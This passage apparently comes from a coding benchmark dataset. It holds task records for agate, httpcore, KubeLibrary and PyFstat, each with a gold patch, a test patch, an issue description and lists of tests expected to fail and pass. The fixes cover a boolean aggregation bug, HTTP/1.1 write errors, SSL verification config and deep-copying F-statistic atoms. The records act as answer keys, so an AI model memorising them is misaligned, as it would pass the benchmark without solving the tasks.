"test/test_utm.py::BadInput::test_from_latlon_range_checks",
"test/test_utm.py::BadInput::test_to_latlon_range_checks",
"test/test_utm.py::Zone32V::test_above",
"test/test_utm.py::Zone32V::test_below",
"test/test_utm.py::Zone32V::test_inside",
"test/test_utm.py::Zone32V::test_left_of",
"test/test_utm.py::Zone32V::test_right_of"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2017-06-26 10:44:15+00:00
|
mit
| 799
|
|
wireservice__agate-637
|
diff --git a/agate/aggregations/any.py b/agate/aggregations/any.py
index 70fa702..67a9651 100644
--- a/agate/aggregations/any.py
+++ b/agate/aggregations/any.py
@@ -32,7 +32,7 @@ class Any(Aggregation):
column = table.columns[self._column_name]
data = column.values()
- if isinstance(column.data_type, Boolean):
+ if isinstance(column.data_type, Boolean) and self._test is None:
return any(data)
return any(self._test(d) for d in data)
|
wireservice/agate
|
0d2671358cdea94c83bd8f28b5a6718a9326b033
|
diff --git a/tests/test_aggregations.py b/tests/test_aggregations.py
index c3c8fbb..11eefe1 100644
--- a/tests/test_aggregations.py
+++ b/tests/test_aggregations.py
@@ -138,6 +138,7 @@ class TestBooleanAggregation(unittest.TestCase):
table = Table(rows, ['test'], [Boolean()])
Any('test').validate(table)
self.assertEqual(Any('test').run(table), False)
+ self.assertEqual(Any('test', lambda r: not r).run(table), True)
def test_all(self):
rows = [
|
agate.All cannot test whether all data is False
If the column data type is boolean, test gets overwritten to search for True values.
|
0.0
|
0d2671358cdea94c83bd8f28b5a6718a9326b033
|
[
"tests/test_aggregations.py::TestBooleanAggregation::test_any"
] |
[
"tests/test_aggregations.py::TestSimpleAggregation::test_all",
"tests/test_aggregations.py::TestSimpleAggregation::test_any",
"tests/test_aggregations.py::TestSimpleAggregation::test_count",
"tests/test_aggregations.py::TestSimpleAggregation::test_count_column",
"tests/test_aggregations.py::TestSimpleAggregation::test_count_value",
"tests/test_aggregations.py::TestSimpleAggregation::test_has_nulls",
"tests/test_aggregations.py::TestSimpleAggregation::test_summary",
"tests/test_aggregations.py::TestBooleanAggregation::test_all",
"tests/test_aggregations.py::TestDateTimeAggregation::test_max",
"tests/test_aggregations.py::TestDateTimeAggregation::test_min",
"tests/test_aggregations.py::TestNumberAggregation::test_deciles",
"tests/test_aggregations.py::TestNumberAggregation::test_iqr",
"tests/test_aggregations.py::TestNumberAggregation::test_mad",
"tests/test_aggregations.py::TestNumberAggregation::test_max",
"tests/test_aggregations.py::TestNumberAggregation::test_max_precision",
"tests/test_aggregations.py::TestNumberAggregation::test_mean",
"tests/test_aggregations.py::TestNumberAggregation::test_mean_with_nulls",
"tests/test_aggregations.py::TestNumberAggregation::test_median",
"tests/test_aggregations.py::TestNumberAggregation::test_min",
"tests/test_aggregations.py::TestNumberAggregation::test_mode",
"tests/test_aggregations.py::TestNumberAggregation::test_percentiles",
"tests/test_aggregations.py::TestNumberAggregation::test_percentiles_locate",
"tests/test_aggregations.py::TestNumberAggregation::test_population_stdev",
"tests/test_aggregations.py::TestNumberAggregation::test_population_variance",
"tests/test_aggregations.py::TestNumberAggregation::test_quartiles",
"tests/test_aggregations.py::TestNumberAggregation::test_quartiles_locate",
"tests/test_aggregations.py::TestNumberAggregation::test_quintiles",
"tests/test_aggregations.py::TestNumberAggregation::test_stdev",
"tests/test_aggregations.py::TestNumberAggregation::test_sum",
"tests/test_aggregations.py::TestNumberAggregation::test_variance",
"tests/test_aggregations.py::TestTextAggregation::test_max_length",
"tests/test_aggregations.py::TestTextAggregation::test_max_length_invalid"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-10-30 16:11:15+00:00
|
mit
| 6,247
|
|
encode__httpcore-641
|
diff --git a/httpcore/_async/http11.py b/httpcore/_async/http11.py
index 7ad3664..32fa3a6 100644
--- a/httpcore/_async/http11.py
+++ b/httpcore/_async/http11.py
@@ -20,6 +20,7 @@ from .._exceptions import (
ConnectionNotAvailable,
LocalProtocolError,
RemoteProtocolError,
+ WriteError,
map_exceptions,
)
from .._models import Origin, Request, Response
@@ -84,10 +85,21 @@ class AsyncHTTP11Connection(AsyncConnectionInterface):
try:
kwargs = {"request": request}
- async with Trace("send_request_headers", logger, request, kwargs) as trace:
- await self._send_request_headers(**kwargs)
- async with Trace("send_request_body", logger, request, kwargs) as trace:
- await self._send_request_body(**kwargs)
+ try:
+ async with Trace(
+ "send_request_headers", logger, request, kwargs
+ ) as trace:
+ await self._send_request_headers(**kwargs)
+ async with Trace("send_request_body", logger, request, kwargs) as trace:
+ await self._send_request_body(**kwargs)
+ except WriteError:
+ # If we get a write error while we're writing the request,
+ # then we supress this error and move on to attempting to
+ # read the response. Servers can sometimes close the request
+ # pre-emptively and then respond with a well formed HTTP
+ # error response.
+ pass
+
async with Trace(
"receive_response_headers", logger, request, kwargs
) as trace:
diff --git a/httpcore/_sync/http11.py b/httpcore/_sync/http11.py
index edcce72..0cc100e 100644
--- a/httpcore/_sync/http11.py
+++ b/httpcore/_sync/http11.py
@@ -20,6 +20,7 @@ from .._exceptions import (
ConnectionNotAvailable,
LocalProtocolError,
RemoteProtocolError,
+ WriteError,
map_exceptions,
)
from .._models import Origin, Request, Response
@@ -84,10 +85,21 @@ class HTTP11Connection(ConnectionInterface):
try:
kwargs = {"request": request}
- with Trace("send_request_headers", logger, request, kwargs) as trace:
- self._send_request_headers(**kwargs)
- with Trace("send_request_body", logger, request, kwargs) as trace:
- self._send_request_body(**kwargs)
+ try:
+ with Trace(
+ "send_request_headers", logger, request, kwargs
+ ) as trace:
+ self._send_request_headers(**kwargs)
+ with Trace("send_request_body", logger, request, kwargs) as trace:
+ self._send_request_body(**kwargs)
+ except WriteError:
+ # If we get a write error while we're writing the request,
+ # then we supress this error and move on to attempting to
+ # read the response. Servers can sometimes close the request
+ # pre-emptively and then respond with a well formed HTTP
+ # error response.
+ pass
+
with Trace(
"receive_response_headers", logger, request, kwargs
) as trace:
|
encode/httpcore
|
80ff02f1276eba3cb6b6493b3f0b033a26d6348d
|
diff --git a/tests/_async/test_connection.py b/tests/_async/test_connection.py
index 8b29942..b6ee0c7 100644
--- a/tests/_async/test_connection.py
+++ b/tests/_async/test_connection.py
@@ -9,10 +9,13 @@ from httpcore import (
SOCKET_OPTION,
AsyncHTTPConnection,
AsyncMockBackend,
+ AsyncMockStream,
AsyncNetworkStream,
ConnectError,
ConnectionNotAvailable,
Origin,
+ RemoteProtocolError,
+ WriteError,
)
@@ -83,7 +86,109 @@ async def test_concurrent_requests_not_available_on_http11_connections():
await conn.request("GET", "https://example.com/")
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.anyio
+async def test_write_error_with_response_sent():
+ """
+ If a server half-closes the connection while the client is sending
+ the request, it may still send a response. In this case the client
+ should successfully read and return the response.
+
+ See also the `test_write_error_without_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(AsyncMockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ async def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(AsyncMockBackend):
+ async def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> AsyncMockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge(
+ [
+ b"HTTP/1.1 413 Payload Too Large\r\n",
+ b"Content-Type: plain/text\r\n",
+ b"Content-Length: 37\r\n",
+ b"\r\n",
+ b"Request body exceeded 1,000,000 bytes",
+ ]
+ )
+
+ async with AsyncHTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ response = await conn.request("POST", "https://example.com/", content=content)
+ assert response.status == 413
+ assert response.content == b"Request body exceeded 1,000,000 bytes"
+
+
+@pytest.mark.anyio
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+async def test_write_error_without_response_sent():
+ """
+ If a server fully closes the connection while the client is sending
+ the request, then client should raise an error.
+
+ See also the `test_write_error_with_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(AsyncMockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ async def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(AsyncMockBackend):
+ async def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> AsyncMockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge([])
+
+ async with AsyncHTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ with pytest.raises(RemoteProtocolError) as exc_info:
+ await conn.request("POST", "https://example.com/", content=content)
+ assert str(exc_info.value) == "Server disconnected without sending a response."
+
+
+@pytest.mark.anyio
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
async def test_http2_connection():
origin = Origin(b"https", b"example.com", 443)
network_backend = AsyncMockBackend(
diff --git a/tests/_sync/test_connection.py b/tests/_sync/test_connection.py
index 9e0c403..37c82e0 100644
--- a/tests/_sync/test_connection.py
+++ b/tests/_sync/test_connection.py
@@ -9,10 +9,13 @@ from httpcore import (
SOCKET_OPTION,
HTTPConnection,
MockBackend,
+ MockStream,
NetworkStream,
ConnectError,
ConnectionNotAvailable,
Origin,
+ RemoteProtocolError,
+ WriteError,
)
@@ -83,7 +86,109 @@ def test_concurrent_requests_not_available_on_http11_connections():
conn.request("GET", "https://example.com/")
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+def test_write_error_with_response_sent():
+ """
+ If a server half-closes the connection while the client is sending
+ the request, it may still send a response. In this case the client
+ should successfully read and return the response.
+
+ See also the `test_write_error_without_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(MockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(MockBackend):
+ def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> MockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge(
+ [
+ b"HTTP/1.1 413 Payload Too Large\r\n",
+ b"Content-Type: plain/text\r\n",
+ b"Content-Length: 37\r\n",
+ b"\r\n",
+ b"Request body exceeded 1,000,000 bytes",
+ ]
+ )
+
+ with HTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ response = conn.request("POST", "https://example.com/", content=content)
+ assert response.status == 413
+ assert response.content == b"Request body exceeded 1,000,000 bytes"
+
+
+
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+def test_write_error_without_response_sent():
+ """
+ If a server fully closes the connection while the client is sending
+ the request, then client should raise an error.
+
+ See also the `test_write_error_with_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(MockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(MockBackend):
+ def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> MockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge([])
+
+ with HTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ with pytest.raises(RemoteProtocolError) as exc_info:
+ conn.request("POST", "https://example.com/", content=content)
+ assert str(exc_info.value) == "Server disconnected without sending a response."
+
+
+
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
def test_http2_connection():
origin = Origin(b"https", b"example.com", 443)
network_backend = MockBackend(
|
Handle HTTP/1.1 half-closed connections gracefully.
There's an HTTP/1.1 case that can occur where...
* The client starts sending a request.
* The server half-closes the connection.
* The server sends a response, such as an HTTP 413 Content Too Large.
Currently our behaviour here is that we'll see a `WriteError` occur here and never get a response.
A more graceful behaviour is handle this case, and return the 413 response.
Prompted via https://github.com/encode/httpx/discussions/2503.
*A follow up question to this will be... is there an equivalent to this for HTTP/2 streams? But let's only consider that once we've dealt with this as a precursor.*
|
0.0
|
80ff02f1276eba3cb6b6493b3f0b033a26d6348d
|
[
"tests/_async/test_connection.py::test_write_error_with_response_sent[asyncio]",
"tests/_async/test_connection.py::test_write_error_without_response_sent[asyncio]",
"tests/_async/test_connection.py::test_write_error_with_response_sent[trio]",
"tests/_async/test_connection.py::test_write_error_without_response_sent[trio]",
"tests/_sync/test_connection.py::test_write_error_with_response_sent",
"tests/_sync/test_connection.py::test_write_error_without_response_sent"
] |
[
"tests/_async/test_connection.py::test_http_connection[asyncio]",
"tests/_async/test_connection.py::test_concurrent_requests_not_available_on_http11_connections[asyncio]",
"tests/_async/test_connection.py::test_http2_connection[asyncio]",
"tests/_async/test_connection.py::test_request_to_incorrect_origin[asyncio]",
"tests/_async/test_connection.py::test_connection_retries[asyncio]",
"tests/_async/test_connection.py::test_connection_retries_tls[asyncio]",
"tests/_async/test_connection.py::test_uds_connections[asyncio]",
"tests/_async/test_connection.py::test_http_connection[trio]",
"tests/_async/test_connection.py::test_concurrent_requests_not_available_on_http11_connections[trio]",
"tests/_async/test_connection.py::test_http2_connection[trio]",
"tests/_async/test_connection.py::test_request_to_incorrect_origin[trio]",
"tests/_async/test_connection.py::test_connection_retries[trio]",
"tests/_async/test_connection.py::test_connection_retries_tls[trio]",
"tests/_async/test_connection.py::test_uds_connections[trio]",
"tests/_sync/test_connection.py::test_http_connection",
"tests/_sync/test_connection.py::test_concurrent_requests_not_available_on_http11_connections",
"tests/_sync/test_connection.py::test_http2_connection",
"tests/_sync/test_connection.py::test_request_to_incorrect_origin",
"tests/_sync/test_connection.py::test_connection_retries",
"tests/_sync/test_connection.py::test_connection_retries_tls",
"tests/_sync/test_connection.py::test_uds_connections"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-13 19:52:44+00:00
|
bsd-3-clause
| 2,109
|
|
devopsspiral__KubeLibrary-124
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index b7b2f42..e8800dd 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,8 +5,14 @@ The format is based on [Keep a Changelog](http://keepachangelog.com/)
and this project adheres to [Semantic Versioning](http://semver.org/).
## In progress
+
+## [0.8.1] - 2022-12-16
+### Added
- Add proxy configuration fetched from `HTTP_PROXY` or `http_proxy` environment variable
+### Fixed
+Fix disabling cert validation [#124](https://github.com/devopsspiral/KubeLibrary/pull/124)
+
## [0.8.0] - 2022-10-27
### Added
- Add function list_namespaced_stateful_set_by_pattern [#114](https://github.com/devopsspiral/KubeLibrary/pull/113) by [@siaomingjeng](https://github.com/siaomingjeng)
diff --git a/src/KubeLibrary/KubeLibrary.py b/src/KubeLibrary/KubeLibrary.py
index 3f73adc..ebff896 100755
--- a/src/KubeLibrary/KubeLibrary.py
+++ b/src/KubeLibrary/KubeLibrary.py
@@ -1,6 +1,5 @@
import json
import re
-import ssl
import urllib3
from os import environ
@@ -276,7 +275,7 @@ class KubeLibrary:
def _add_api(self, reference, class_name):
self.__dict__[reference] = class_name(self.api_client)
if not self.cert_validation:
- self.__dict__[reference].api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'] = ssl.CERT_NONE
+ self.__dict__[reference].api_client.configuration.verify_ssl = False
def k8s_api_ping(self):
"""Performs GET on /api/v1/ for simple check of API availability.
diff --git a/src/KubeLibrary/version.py b/src/KubeLibrary/version.py
index 8675559..73baf8f 100644
--- a/src/KubeLibrary/version.py
+++ b/src/KubeLibrary/version.py
@@ -1,1 +1,1 @@
-version = "0.8.0"
+version = "0.8.1"
|
devopsspiral/KubeLibrary
|
7f4037c283a38751f9a31160944a17e7b80ec97b
|
diff --git a/test/test_KubeLibrary.py b/test/test_KubeLibrary.py
index b99291b..7cae67e 100644
--- a/test/test_KubeLibrary.py
+++ b/test/test_KubeLibrary.py
@@ -1,7 +1,6 @@
import json
import mock
import re
-import ssl
import unittest
from KubeLibrary import KubeLibrary
from KubeLibrary.exceptions import BearerTokenWithPrefixException
@@ -306,7 +305,7 @@ class TestKubeLibrary(unittest.TestCase):
kl = KubeLibrary(kube_config='test/resources/k3d', cert_validation=False)
for api in TestKubeLibrary.apis:
target = getattr(kl, api)
- self.assertEqual(target.api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'], ssl.CERT_NONE)
+ self.assertEqual(target.api_client.configuration.verify_ssl, False)
@responses.activate
def test_KubeLibrary_inits_with_bearer_token(self):
|
certificate verify failed issue when using Get Namespaced Pod Exec
When using the Get Namespaced Pod Exec keywork on a k8s cluster using a custom CA, the following error occurs :
```
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get issuer certificate (_ssl.c:1129)
```
Other keywords (Read Namespaced Pod Status, List Namespaced Pod By Pattern ...) are working as expected.
As a quick fix, I'm adding the following line in the _add_api method of the library :
```
def _add_api(self, reference, class_name):
self.__dict__[reference] = class_name(self.api_client)
if not self.cert_validation:
self.__dict__[reference].api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'] = ssl.CERT_NONE
self.__dict__[reference].api_client.configuration.verify_ssl = False
```
Am I missing something regarding the library configuration ?
Versions :
```
KubeLibrary: 0.8.0
Python: 3.9.13
Kubernetes: 1.24
```
KubeLibrary :
```
Library KubeLibrary kube_config=${KUBECONFIG_FILE} cert_validation=False
KubeLibrary.Get Namespaced Pod Exec
... name=my-pod
... namespace=${namespace}
... argv_cmd=${command}
```
|
0.0
|
7f4037c283a38751f9a31160944a17e7b80ec97b
|
[
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_deployment_by_pattern"
] |
[
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_delete",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_bearer_token",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_endpoints",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_daemon_set",
"test/test_KubeLibrary.py::TestKubeLibrary::test_inits_all_api_clients",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_pod_has_annotations",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_secret_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_create",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_without_container",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_cron_job",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_ingress",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_service_account_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_horizontal_pod_autoscaler",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_container_has_env_vars",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_ingress",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_replace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_job_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_context",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_daemon_set",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_matching_pods_in_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_not_argv_and_list",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_configmaps_in_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_cluster_role_binding",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_containers_images",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_pods_containers_statuses_by_name",
"test/test_KubeLibrary.py::TestKubeLibrary::test_evaluate_callable_from_k8s_client",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_persistent_volume_claim_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_init",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_kubelet_version",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_role_binding",
"test/test_KubeLibrary.py::TestKubeLibrary::test_generate_alphanumeric_str",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_from_kubeconfig",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_pod_has_labels",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_pods_containers_by_name",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_patch",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_bearer_token_with_ca_crt",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_role",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_containers_resources",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_with_container",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_fails_for_wrong_context",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_stateful_set_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_persistent_volume_claim",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_horizontal_pod_autoscaler",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_get",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_service",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_service",
"test/test_KubeLibrary.py::TestKubeLibrary::test_inits_with_bearer_token_raises_BearerTokenWithPrefixException",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_pod_status",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_replica_set_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_cron_job",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_pod_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_cluster_role"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-16 14:17:09+00:00
|
mit
| 1,894
|
|
PyFstat__PyFstat-489
|
diff --git a/docs/source/pyfstat.utils.rst b/docs/source/pyfstat.utils.rst
index 260c2a7..1465894 100644
--- a/docs/source/pyfstat.utils.rst
+++ b/docs/source/pyfstat.utils.rst
@@ -7,7 +7,7 @@ Most of these are used internally by other parts of the package
and are of interest mostly only for developers,
but others can also be helpful for end users.
-Functions in these modules can be directly acessed via ``pyfstat.utils``
+Functions in these modules can be directly accessed via ``pyfstat.utils``
without explicitly mentioning the specific module in where they reside.
(E.g. just call ``pyfstat.utils.some_function``,
not ``pyfstat.utils.some_topic.some_function``.)
@@ -15,6 +15,14 @@ not ``pyfstat.utils.some_topic.some_function``.)
Submodules
----------
+pyfstat.utils.atoms module
+--------------------------
+
+.. automodule:: pyfstat.utils.atoms
+ :members:
+ :undoc-members:
+ :show-inheritance:
+
pyfstat.utils.cli module
------------------------
diff --git a/pyfstat/core.py b/pyfstat/core.py
index 9f0b3f1..023ec12 100644
--- a/pyfstat/core.py
+++ b/pyfstat/core.py
@@ -1317,19 +1317,10 @@ class ComputeFstat(BaseSearchClass):
# and return the maximum of that?
idx_maxTwoF = self.FstatMap.get_maxF_idx()
for X in range(self.FstatResults.numDetectors):
- # For each detector, we need to build a MultiFstatAtomVector
- # because that's what the Fstat map function expects.
- singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
- # The first [0] index on the multiFatoms here is over frequency bins;
+ # The [0] index on the multiFatoms here is over frequency bins;
# we always operate on a single bin.
- singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
- self.FstatResults.multiFatoms[0].data[X].length
- )
- singleIFOmultiFatoms.data[0].TAtom = (
- self.FstatResults.multiFatoms[0].data[X].TAtom
- )
- singleIFOmultiFatoms.data[0].data = (
- self.FstatResults.multiFatoms[0].data[X].data
+ singleIFOmultiFatoms = utils.extract_singleIFOmultiFatoms_from_multiAtoms(
+ self.FstatResults.multiFatoms[0], X
)
FXstatMap, timingFXstatMap = tcw.call_compute_transient_fstat_map(
self.tCWFstatMapVersion,
@@ -1987,19 +1978,10 @@ class SemiCoherentSearch(ComputeFstat):
"This function is available only if singleFstats or BSGL options were set."
)
for X in range(self.FstatResults.numDetectors):
- # For each detector, we need to build a MultiFstatAtomVector
- # because that's what the Fstat map function expects.
- singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
- # The first [0] index on the multiFatoms here is over frequency bins;
+ # The [0] index on the multiFatoms here is over frequency bins;
# we always operate on a single bin.
- singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
- self.FstatResults.multiFatoms[0].data[X].length
- )
- singleIFOmultiFatoms.data[0].TAtom = (
- self.FstatResults.multiFatoms[0].data[X].TAtom
- )
- singleIFOmultiFatoms.data[0].data = (
- self.FstatResults.multiFatoms[0].data[X].data
+ singleIFOmultiFatoms = utils.extract_singleIFOmultiFatoms_from_multiAtoms(
+ self.FstatResults.multiFatoms[0], X
)
FXstatMap = lalpulsar.ComputeTransientFstatMap(
multiFstatAtoms=singleIFOmultiFatoms,
diff --git a/pyfstat/utils/__init__.py b/pyfstat/utils/__init__.py
index 7230235..2161e53 100644
--- a/pyfstat/utils/__init__.py
+++ b/pyfstat/utils/__init__.py
@@ -6,6 +6,7 @@ and are of interest mostly only for developers,
but others can also be helpful for end users.
"""
+from .atoms import copy_FstatAtomVector, extract_singleIFOmultiFatoms_from_multiAtoms
from .cli import match_commandlines, run_commandline
from .converting import (
convert_aPlus_aCross_to_h0_cosi,
diff --git a/pyfstat/utils/atoms.py b/pyfstat/utils/atoms.py
new file mode 100644
index 0000000..39eb2f8
--- /dev/null
+++ b/pyfstat/utils/atoms.py
@@ -0,0 +1,69 @@
+import logging
+
+import lalpulsar
+
+logger = logging.getLogger(__name__)
+
+
+def extract_singleIFOmultiFatoms_from_multiAtoms(
+ multiAtoms: lalpulsar.MultiFstatAtomVector, X: int
+) -> lalpulsar.MultiFstatAtomVector:
+ """Extract a length-1 MultiFstatAtomVector from a larger MultiFstatAtomVector.
+
+ The result is needed as input to ``lalpulsar.ComputeTransientFstatMap`` in some places.
+
+ The new object is freshly allocated,
+ and we do a deep copy of the actual per-timestamp atoms.
+
+ Parameters
+ -------
+ multiAtoms:
+ Fully allocated multi-detector struct of `length > X`.
+ X:
+ The detector index for which to extract atoms.
+ Returns
+ -------
+ singleIFOmultiFatoms:
+ Length-1 MultiFstatAtomVector with only the data for detector `X`.
+ """
+ if X >= multiAtoms.length:
+ raise ValueError(
+ f"Detector index {X} is out of range for multiAtoms of length {multiAtoms.length}."
+ )
+ singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
+ singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
+ multiAtoms.data[X].length
+ )
+ # we deep-copy the entries of the atoms vector,
+ # since just assigning the whole array can cause a segfault
+ # from memory cleanup in looping over this function
+ copy_FstatAtomVector(singleIFOmultiFatoms.data[0], multiAtoms.data[X])
+ return singleIFOmultiFatoms
+
+
+def copy_FstatAtomVector(
+ dest: lalpulsar.FstatAtomVector, src: lalpulsar.FstatAtomVector
+):
+ """Deep-copy an FstatAtomVector with all its per-SFT FstatAtoms.
+
+ The two vectors must have the same length,
+ and the destination vector must already be allocated.
+
+ Parameters
+ -------
+ dest:
+ The destination vector to copy to.
+ Must already be allocated.
+ Will be modified in-place.
+ src:
+ The source vector to copy from.
+ """
+ if dest.length != src.length:
+ raise ValueError(
